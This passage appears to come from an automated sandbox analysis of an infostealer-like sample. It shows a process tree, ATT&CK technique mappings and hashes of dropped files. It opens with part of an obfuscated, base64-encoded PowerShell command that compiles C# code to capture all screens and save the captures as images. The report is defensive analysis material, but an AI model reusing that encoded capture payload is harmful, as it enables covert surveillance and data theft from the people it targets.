AaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5552
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ptju2qp\5ptju2qp.cmdline"
        6⤵
        
        PID:1300
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC7D4.tmp" "c:\Users\Admin\AppData\Local\Temp\5ptju2qp\CSC5D6606692E8A401787EA929A77CB4148.TMP"
        7⤵
        
        PID:6020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,11134243432919124318,8737276137192650529,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5672 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5504

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:872

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1524

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\UndoExport.m1v"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ce4c898f8fc7601e2fbc252fdadb5115

SHA1
01bf06badc5da353e539c7c07527d30dccc55a91

SHA256
bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa

SHA512
80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4158365912175436289496136e7912c2

SHA1
813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59

SHA256
354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1

SHA512
74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
b8df6e317f650c547124718adc043b64

SHA1
46350c6e24d19dcc0e21484d12affb196fed04d2

SHA256
a8410c6371dce261b8791581b8a108b65e307400faa76695d0b1555838ea68b4

SHA512
65c085036c50148ce44349a4b1f6950a98fa302bcf6d1b2dd2c247e937c7a8130ef3ac8f012dec6a991d7f6921b5d3113f97d47e06f43717bea55baf08b1bbc1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
186B

MD5
094ab275342c45551894b7940ae9ad0d

SHA1
2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

SHA256
ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

SHA512
19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
e6636800adee7552a5f267d1dd994a16

SHA1
7783c2b58a8fdcd31c38e8ae47a843d976601d39

SHA256
edbe6b76d469fce0054eab490108674d8fd646b0dec8857a6e22e828ff5d9023

SHA512
aebc53415ca6cfe328c506eaefcb6f5d2e28b2ab0487c724b86191a361d98f673d16bf8b38fbb54a52eadccbb691cb49335de4fcf0d2e09725daf31a50b05bd4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c4020e6b36937e990bd21e4c7a58c13b

SHA1
ffc60a42698a22d5b0158c843c96e1fa5d25609a

SHA256
59fb30c6a71a6820fedd09fbc453d688a74e9b31891b313ce32f0428bae895b0

SHA512
1ce2433a2122de9f8856f396f2aa1cff02d8f5880bd92669ae7a5eea718f40cd76c6c438dd6bdea8193f6b8cc7d9240628cf98ae497a1ce1c16f2c0aab78734d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c6958bf3fa85edbdcd04413a1405eb41

SHA1
29d9480a99ad98cb2936727f12074e3cd0fb80d8

SHA256
afdeb4f07b9f5e7d6fccb41fafd8695c733380c423dde263478e21184da30b34

SHA512
0cb45284e7ad7c7baf1481b5e9c0171b7f6865fa97e425b291616c745124c1a88f31fc84fa9ce8daeaf73690b5ab0f62f2d8458b47bb02e33ba2dad64dece69f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
1b9f84def46a8e876b638ea70b7bf98f

SHA1
ac3b5451a07064eb4af22a0f762656f5518a958f

SHA256
6c75948becd0c8f4bd929e1f33a5d9a46760b7d3c8f1dd23288eb7f9ad99c22c

SHA512
2528fe4629c8dc1d9738d631cd56e6e7e6f74bcd07b76acff649ad497e3e55690baf6f5915a0013499580b399f5cc8773b2c14c12a5e03a536134badb2e1cf03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
40738a33d70a998498708ffc91d5e25a

SHA1
ce4112489dd9a87fb54661bd7cca42d0f0202885

SHA256
c9a359ac646bd8afe6ba3687d63e6b8cf1ab997e2400ff69f9464f0b29b04c16

SHA512
42742c807e4f3fd5d37ca2f631cadc2b2bb084fe4e9ee8be74b388073571b1bd831a3a91b5fa3ca237f171d19055b8e9970eb96fdf9116f6c4ee0b4ebeb371d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
37139df4be0649db71a970fd98cdc086

SHA1
da3cf308d33ff902519233955f446842b80c89e2

SHA256
95394a7e61faff831daec350d73cb031aa4edbb897fbdaa263d7d1865d0624a0

SHA512
ee0d37cafa5cd87220f2428720996a55572b4e9f582a583587790b7a19005b78e4d93676a86b23e765449d20ef31824bc0f5d1fb400f99b493e90ff33faf6e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Temp\5ptju2qp\5ptju2qp.dll

Filesize
4KB

MD5
0453f84d14996169d4735cfe6a38ec8e

SHA1
de6c44d8d4add84db4d7722830400952e5055e3c

SHA256
642b5d3e893ef8d2347c957a242daf8c6b5f3e230021c04c2b7064c513df6e5d

SHA512
3a96d640190f6c21e38bc5f47c3a1edbaab6f7b398529815481f7142a1762a9afc8971d1bf7a6aeda98833436fd20be5e6eb2b0980a75ca8dc41372639e5ef36

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC7D4.tmp

Filesize
1KB

MD5
25f2084ce42456628027a64f12d92e14

SHA1
c3d37b94c9db4e2f7e4219c3582539417d337a41

SHA256
0983000ecf363c5d78e25e9eddb6ac99b4f0e09351a5a8c45a7bc9ec8c4037a6

SHA512
7a39195364c27ec33e86f5d63193ccc08b2434112cfd845bd2006ef135bca59e9b7d801932c594f27652551310f038864313a0b45ce3a8d5048e5362847f4129

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Microsoft.Web.WebView2.Core.dll

Filesize
488KB

MD5
851fee9a41856b588847cf8272645f58

SHA1
ee185a1ff257c86eb19d30a191bf0695d5ac72a1

SHA256
5e7faee6b8230ca3b97ce9542b914db3abbbd1cb14fd95a39497aaad4c1094ca

SHA512
cf5c70984cf33e12cf57116da1f282a5bd6433c570831c185253d13463b0b9a0b9387d4d1bf4dddab3292a5d9ba96d66b6812e9d7ebc5eb35cb96eea2741348f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Microsoft.Web.WebView2.Wpf.dll

Filesize
43KB

MD5
34ec990ed346ec6a4f14841b12280c20

SHA1
6587164274a1ae7f47bdb9d71d066b83241576f0

SHA256
1e987b22cd011e4396a0805c73539586b67df172df75e3dded16a77d31850409

SHA512
b565015ca4b11b79ecbc8127f1fd40c986948050f1caefdd371d34ed2136af0aabf100863dc6fd16d67e3751d44ee13835ea9bf981ac0238165749c4987d1ae0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Monaco\fileaccess\node_modules\get-intrinsic\.nycrc

Filesize
139B

MD5
d0104f79f0b4f03bbcd3b287fa04cf8c

SHA1
54f9d7adf8943cb07f821435bb269eb4ba40ccc2

SHA256
997785c50b0773e5e18bf15550fbf57823c634fefe623cd37b3c83696402ad0a

SHA512
daf9b5445cfc02397f398adfa0258f2489b70699dfec6ca7e5b85afe5671fdcabe59edee332f718f5e5778feb1e301778dffe93bb28c1c0914f669659bad39c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Monaco\fileaccess\node_modules\hasown\.eslintrc

Filesize
43B

MD5
c28b0fe9be6e306cc2ad30fe00e3db10

SHA1
af79c81bd61c9a937fca18425dd84cdf8317c8b9

SHA256
0694050195fc694c5846b0a2a66b437ac775da988f0a779c55fb892597f7f641

SHA512
e3eca17804522ffa4f41e836e76e397a310a20e8261a38115b67e8b644444153039d04198fb470f45be2997d2c7a72b15bd4771a02c741b3cbc072ea6ef432e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Monaco\fileaccess\node_modules\hasown\.nycrc

Filesize
216B

MD5
c2ab942102236f987048d0d84d73d960

SHA1
95462172699187ac02eaec6074024b26e6d71cff

SHA256
948366fea3b423a46366326d0bb2e54b08abd1cf0b243678ba6625740c40da5a

SHA512
e36b20c16ceeb090750f3865efc8d7fd983ae4e8b41c30cc3865d2fd4925bf5902627e1f1ed46c0ff2453f076ef9de34be899ef57754b29cd158440071318479

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Monaco\fileaccess\node_modules\vary\LICENSE

Filesize
1KB

MD5
13babc4f212ce635d68da544339c962b

SHA1
4881ad2ec8eb2470a7049421047c6d076f48f1de

SHA256
bd47ce7b88c7759630d1e2b9fcfa170a0f1fde522be09e13fb1581a79d090400

SHA512
40e30174433408e0e2ed46d24373b12def47f545d9183b7bce28d4ddd8c8bb528075c7f20e118f37661db9f1bba358999d81a14425eb3e0a4a20865dfcb53182

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\WebView2Loader.dll

Filesize
133KB

MD5
a0bd0d1a66e7c7f1d97aedecdafb933f

SHA1
dd109ac34beb8289030e4ec0a026297b793f64a3

SHA256
79d7e45f8631e8d2541d01bfb5a49a3a090be72b3d465389a2d684680fee2e36

SHA512
2a50ae5c7234a44b29f82ebc2e3cfed37bf69294eb00b2dc8905c61259975b2f3a059c67aeab862f002752454d195f7191d9b82b056f6ef22d6e1b0bb3673d50

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Wpf.Ui.dll

Filesize
5.2MB

MD5
aead90ab96e2853f59be27c4ec1e4853

SHA1
43cdedde26488d3209e17efff9a51e1f944eb35f

SHA256
46cfbe804b29c500ebc0b39372e64c4c8b4f7a8e9b220b5f26a9adf42fcb2aed

SHA512
f5044f2ee63906287460b9adabfcf3c93c60b51c86549e33474c4d7f81c4f86cd03cd611df94de31804c53006977874b8deb67c4bf9ea1c2b70c459b3a44b38d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bin\path.txt

Filesize
41B

MD5
f31f145d67c49e17e6c3db61287bb188

SHA1
022551a9d72604cdf132cc4743df8fff787579c3

SHA256
56f9ff1e937f3abe175998cafc77022c8ce17d5443ebad2d9c3cddf6c55ef24a

SHA512
755bc26dc680b958c1b1382cb48072e864013f95ddaa9f3bd40aba7d54124725015120e735f5729bfb62cfd6134996dea8ee46ee1d84b3575bb07ca75fe5c2c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.dll

Filesize
5.2MB

MD5
8516475948d5cc69f60965d650b85a00

SHA1
c9558af61af110cec85c6477f4d5872acc9d40c0

SHA256
5037e6c632f221686441ac6fe141a5812c8557588baafc5966b748805dc6944a

SHA512
16b8b01473cb7600a64c51a51905e3a3d12408a251186b97c22698e3d9c051f46d3735db4fb7fe9040f00c55d2767be5b2c609bb0dfa8b63b1ef5d5aa20f2876

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Filesize
85KB

MD5
f8f4522d11178a26e97e2046f249dfa7

SHA1
8b591d9a37716e235260fb6b3f601e4ccbebf15d

SHA256
3c372a8919c28dc76414b2f30da423c3e1018b1a8444527949ce20cc3fc93ed0

SHA512
52ea881cad501cf1d5e8ac47355e862ac1bd39cb6e1ff3d362d392b6f2d676e74878832505d17a552aaa3bc8f3977da11fa3f9903722eedd23716fb46ddb7492

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Extension State\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Extension State\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Shared Dictionary\cache\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GraphiteDawnCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GraphiteDawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GraphiteDawnCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GraphiteDawnCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c172d6e8f5ea8b8f824a6a7316.exe

Filesize
28KB

MD5
d88a9278615d67b4c7d696d2747fbfce

SHA1
0ff3dfb71c4fafb48a2ddba1863a399940d9c9b8

SHA256
8702f53ade009c00cad93d401faa7ccdaef3ea9f24098a33fcb5f3811a3f1ae8

SHA512
6d3c25fc9ae0300dd1368920816534507e545fc7c8ce7546ee6d83fea83b40faf415ecf1198602ad0cf722b355da138d16a50f2ee3201cb7f8b393a46ecc4f60

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.exe

Filesize
9.5MB

MD5
f29231e5f5047dd3cf19b9929f0b614f

SHA1
d9ac03e95e1606842fccdd353a3a42b91dd5ba84

SHA256
fcc739776d06abd2954bc07240d03fc03a43b94810494c48c7ad0ee67b41612e

SHA512
a92913b11353d69299abf1dc6bfa913cea09e6750cf46bcd95d1a8cf6cad2584a1709ef17e9d6502111867aa4d576b970e079dc1b4548cd211e995e8189a9a50

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\libcurl.dll

Filesize
522KB

MD5
e31f5136d91bad0fcbce053aac798a30

SHA1
ee785d2546aec4803bcae08cdebfd5d168c42337

SHA256
ee94e2201870536522047e6d7fe7b903a63cd2e13e20c8fffc86d0e95361e671

SHA512
a1543eb1d10d25efb44f9eaa0673c82bfac5173055d04c0f3be4792984635a7c774df57a8e289f840627754a4e595b855d299070d469e0f1e637c3f35274abe6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat

Filesize
18KB

MD5
5e2234ee5204f332df83c6c9e78eb035

SHA1
7b40c18a1d09666a22cb0d27cb53f3b00fe07455

SHA256
00579395f3b967bb110486ee7c787c0fa2f0f90b8322462478e7265492f6ec82

SHA512
4035a8d7058dd081e035d614373288aeb33c2214defbf0f5667de35e0f42b44cc743a2e60926f6b196f4820c7f36034daaf2336389b222c94c2b9bd1dbf3d9cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tmp

Filesize
14B

MD5
ce585c6ba32ac17652d2345118536f9c

SHA1
be0e41b3690c42e4c0cdb53d53fc544fb46b758d

SHA256
589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

SHA512
d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\vcruntime140.dll

Filesize
99KB

MD5
7a2b8cfcd543f6e4ebca43162b67d610

SHA1
c1c45a326249bf0ccd2be2fbd412f1a62fb67024

SHA256
7d7ca28235fba5603a7f40514a552ac7efaa67a5d5792bb06273916aa8565c5f

SHA512
e38304fb9c5af855c1134f542adf72cde159fab64385533eafa5bb6e374f19b5a29c0cb5516fc5da5c0b5ac47c2f6420792e0ac8ddff11e749832a7b7f3eb5c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\zlib1.dll

Filesize
113KB

MD5
75365924730b0b2c1a6ee9028ef07685

SHA1
a10687c37deb2ce5422140b541a64ac15534250f

SHA256
945e7f5d09938b7769a4e68f4ef01406e5af9f40db952cba05ddb3431dd1911b

SHA512
c1e31c18903e657203ae847c9af601b1eb38efa95cb5fa7c1b75f84a2cba9023d08f1315c9bb2d59b53256dfdb3bac89930252138475491b21749471adc129a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_veqtcy31.3ev.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hqEYt57XSj\Display (1).png

Filesize
44KB

MD5
72c382afa7fc00533899b011a9eb1f18

SHA1
fb9fd84a7048d04acd287ace9365f01df16a1f29

SHA256
17239e83c5c51bcccdf665b85703612ea516a1d3f6b8b83651541f17f0264045

SHA512
